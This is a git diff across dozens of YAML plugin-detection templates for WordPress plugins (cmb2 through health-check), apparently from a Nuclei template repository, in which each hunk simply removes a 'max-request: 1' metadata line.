--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cmb2/
metadata:
- max-request: 1
plugin_namespace: cmb2
wpscan: https://wpscan.com/plugin/cmb2
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coblocks/
metadata:
- max-request: 1
plugin_namespace: coblocks
wpscan: https://wpscan.com/plugin/coblocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/code-snippets/
metadata:
- max-request: 1
plugin_namespace: code-snippets
wpscan: https://wpscan.com/plugin/code-snippets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coming-soon/
metadata:
- max-request: 1
plugin_namespace: coming-soon
wpscan: https://wpscan.com/plugin/coming-soon
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/complianz-gdpr/
metadata:
- max-request: 1
plugin_namespace: complianz-gdpr
wpscan: https://wpscan.com/plugin/complianz-gdpr
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7-honeypot/
metadata:
- max-request: 1
plugin_namespace: contact-form-7-honeypot
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7/
metadata:
- max-request: 1
plugin_namespace: contact-form-7
wpscan: https://wpscan.com/plugin/contact-form-7
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-cfdb7/
metadata:
- max-request: 1
plugin_namespace: contact-form-cfdb7
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-law-info/
metadata:
- max-request: 1
plugin_namespace: cookie-law-info
wpscan: https://wpscan.com/plugin/cookie-law-info
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-notice/
metadata:
- max-request: 1
plugin_namespace: cookie-notice
wpscan: https://wpscan.com/plugin/cookie-notice
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creame-whatsapp-me/
metadata:
- max-request: 1
plugin_namespace: creame-whatsapp-me
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
metadata:
- max-request: 1
plugin_namespace: creative-mail-by-constant-contact
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-css-js/
metadata:
- max-request: 1
plugin_namespace: custom-css-js
wpscan: https://wpscan.com/plugin/custom-css-js
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index d6200aaea4..814e603d75 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-fonts/
metadata:
- max-request: 1
plugin_namespace: custom-fonts
wpscan: https://wpscan.com/plugin/custom-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-post-type-ui/
metadata:
- max-request: 1
plugin_namespace: custom-post-type-ui
wpscan: https://wpscan.com/plugin/custom-post-type-ui
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-comments/
metadata:
- max-request: 1
plugin_namespace: disable-comments
wpscan: https://wpscan.com/plugin/disable-comments
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-gutenberg/
metadata:
- max-request: 1
plugin_namespace: disable-gutenberg
wpscan: https://wpscan.com/plugin/disable-gutenberg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-page/
metadata:
- max-request: 1
plugin_namespace: duplicate-page
wpscan: https://wpscan.com/plugin/duplicate-page
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-post/
metadata:
- max-request: 1
plugin_namespace: duplicate-post
wpscan: https://wpscan.com/plugin/duplicate-post
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicator/
metadata:
- max-request: 1
plugin_namespace: duplicator
wpscan: https://wpscan.com/plugin/duplicator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
metadata:
- max-request: 1
plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-fancybox/
metadata:
- max-request: 1
plugin_namespace: easy-fancybox
wpscan: https://wpscan.com/plugin/easy-fancybox
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
index 96c813ad49..c9859e9770 100644
--- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml
+++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-google-fonts/
metadata:
- max-request: 1
plugin_namespace: easy-google-fonts
wpscan: https://wpscan.com/plugin/easy-google-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-table-of-contents/
metadata:
- max-request: 1
plugin_namespace: easy-table-of-contents
wpscan: https://wpscan.com/plugin/easy-table-of-contents
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-wp-smtp/
metadata:
- max-request: 1
plugin_namespace: easy-wp-smtp
wpscan: https://wpscan.com/plugin/easy-wp-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementor/
metadata:
- max-request: 1
plugin_namespace: elementor
wpscan: https://wpscan.com/plugin/elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementskit-lite/
metadata:
- max-request: 1
plugin_namespace: elementskit-lite
wpscan: https://wpscan.com/plugin/elementskit-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/enable-media-replace/
metadata:
- max-request: 1
plugin_namespace: enable-media-replace
wpscan: https://wpscan.com/plugin/enable-media-replace
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/envato-elements/
metadata:
- max-request: 1
plugin_namespace: envato-elements
wpscan: https://wpscan.com/plugin/envato-elements
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
metadata:
- max-request: 1
plugin_namespace: essential-addons-for-elementor-lite
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ewww-image-optimizer/
metadata:
- max-request: 1
plugin_namespace: ewww-image-optimizer
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/facebook-for-woocommerce/
metadata:
- max-request: 1
plugin_namespace: facebook-for-woocommerce
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fast-indexing-api/
metadata:
- max-request: 1
plugin_namespace: fast-indexing-api
wpscan: https://wpscan.com/plugin/fast-indexing-api
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
metadata:
- max-request: 1
plugin_namespace: favicon-by-realfavicongenerator
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/flamingo/
metadata:
- max-request: 1
plugin_namespace: flamingo
wpscan: https://wpscan.com/plugin/flamingo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fluentform/
metadata:
- max-request: 1
plugin_namespace: fluentform
wpscan: https://wpscan.com/plugin/fluentform
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/font-awesome/
metadata:
- max-request: 1
plugin_namespace: font-awesome
wpscan: https://wpscan.com/plugin/font-awesome
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/force-regenerate-thumbnails/
metadata:
- max-request: 1
plugin_namespace: force-regenerate-thumbnails
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/formidable/
metadata:
- max-request: 1
plugin_namespace: formidable
wpscan: https://wpscan.com/plugin/formidable
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/forminator/
metadata:
- max-request: 1
plugin_namespace: forminator
wpscan: https://wpscan.com/plugin/forminator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ga-google-analytics/
metadata:
- max-request: 1
plugin_namespace: ga-google-analytics
wpscan: https://wpscan.com/plugin/ga-google-analytics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
- max-request: 1
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 23a88ea130..88d38e21ed 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
metadata:
- max-request: 1
plugin_namespace: google-analytics-dashboard-for-wp
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-for-wordpress/
metadata:
- max-request: 1
plugin_namespace: google-analytics-for-wordpress
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 575c9ebe67..840c086fb9 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-listings-and-ads/
metadata:
- max-request: 1
plugin_namespace: google-listings-and-ads
wpscan: https://wpscan.com/plugin/google-listings-and-ads
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-site-kit/
metadata:
- max-request: 1
plugin_namespace: google-site-kit
wpscan: https://wpscan.com/plugin/google-site-kit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-sitemap-generator/
metadata:
- max-request: 1
plugin_namespace: google-sitemap-generator
wpscan: https://wpscan.com/plugin/google-sitemap-generator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gtranslate/
metadata:
- max-request: 1
plugin_namespace: gtranslate
wpscan: https://wpscan.com/plugin/gtranslate
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gutenberg/
metadata:
- max-request: 1
plugin_namespace: gutenberg
wpscan: https://wpscan.com/plugin/gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/happy-elementor-addons/
metadata:
- max-request: 1
plugin_namespace: happy-elementor-addons
wpscan: https://wpscan.com/plugin/happy-elementor-addons
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
index 2409c6b370..a8eca7b056 100644
--- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
+++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-and-footer-scripts/
metadata:
- max-request: 1
plugin_namespace: header-and-footer-scripts
wpscan: https://wpscan.com/plugin/header-and-footer-scripts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-code-manager/
metadata:
- max-request: 1
plugin_namespace: header-footer-code-manager
wpscan: https://wpscan.com/plugin/header-footer-code-manager
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-elementor/
metadata:
- max-request: 1
plugin_namespace: header-footer-elementor
wpscan: https://wpscan.com/plugin/header-footer-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer/
metadata:
- max-request: 1
plugin_namespace: header-footer
wpscan: https://wpscan.com/plugin/header-footer
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/health-check/
metadata:
- max-request: 1
plugin_namespace: health-check
wpscan: https://wpscan.com/plugin/health-check
tags: tech,wordpress,wp-plugin,top-200
